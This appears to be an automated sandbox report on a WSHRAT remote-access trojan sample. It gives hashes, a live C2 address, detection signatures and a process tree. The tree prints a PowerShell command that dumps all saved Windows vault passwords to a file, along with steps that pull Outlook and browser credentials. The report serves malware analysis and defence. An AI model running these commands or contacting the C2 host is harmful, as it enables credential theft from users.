Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    11/10/2021, 06:54

General

  • Target

    Scan00051.js

  • Size

    1006KB

  • MD5

    88cc26a74a561426df5302d399744ffb

  • SHA1

    defaafa787d512c1bd654266bbb052965d225e16

  • SHA256

    4ee22add9e3dfc6d9b5f02f56aeebed5944d7b325196c04d935f8093ba3bc301

  • SHA512

    6f5cd63b18c3646b4052f2e895e9bc69db1829fbbc4e86d228d32bc7188f14b130d4ff8427fdc4aa2aa7730d8813ac169752725da26e84aab65a9b00ad02ab0b

Malware Config

Extracted

Family

wshrat

C2

http://147.182.241.104:7121

Signatures

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • suricata: ET MALWARE WSHRAT CnC Checkin

    suricata: ET MALWARE WSHRAT CnC Checkin

  • suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound

    suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound

  • suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

    suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

  • Blocklisted process makes network request 23 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 26 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 21 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan00051.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2840
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3136
      • C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
        C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:3432
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:956
      • C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
        C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:1276
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2176
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2280
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3516
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2000
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook accounts
      PID:4092
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
      2⤵
        PID:2980
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
      1⤵
        PID:1432

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2840-118-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-127-0x0000024D47340000-0x0000024D47342000-memory.dmp

        Filesize

        8KB

      • memory/2840-119-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-138-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-139-0x0000024D47346000-0x0000024D47348000-memory.dmp

        Filesize

        8KB

      • memory/2840-120-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-125-0x0000024D49320000-0x0000024D49321000-memory.dmp

        Filesize

        4KB

      • memory/2840-124-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-137-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-136-0x0000024D472E0000-0x0000024D472E1000-memory.dmp

        Filesize

        4KB

      • memory/2840-122-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-116-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-134-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-117-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-126-0x0000024D2F160000-0x0000024D2F161000-memory.dmp

        Filesize

        4KB

      • memory/2840-133-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-128-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB

      • memory/2840-129-0x0000024D47343000-0x0000024D47345000-memory.dmp

        Filesize

        8KB

      • memory/2840-121-0x0000024D2F130000-0x0000024D2F131000-memory.dmp

        Filesize

        4KB

      • memory/2840-123-0x0000024D2D330000-0x0000024D2D332000-memory.dmp

        Filesize

        8KB